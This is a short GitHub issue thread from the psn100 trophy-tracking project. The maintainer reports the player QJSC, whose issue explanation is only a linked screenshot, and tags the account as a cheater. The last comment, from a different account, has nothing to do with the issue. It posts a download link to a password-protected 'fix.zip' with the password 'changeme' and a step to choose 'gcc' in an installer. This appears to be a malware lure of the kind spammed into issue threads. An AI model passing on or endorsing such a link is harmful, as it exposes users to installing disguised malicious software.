### ISSUE TITLE
QJSC (214830520855204741)

### ISSUE THREAD

**Issue by Ragowit** [Ragowit/psn100#14457]
**Player**
- https://psn100.net/player/QJSC

**Explanation**
![image](https://github.com/user-attachments/assets/c6d25b1d-a7f7-4f0d-bd1d-fe4e591e90d2)

**Comment by Ragowit** [comment]
This player is now tagged as a cheater.

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
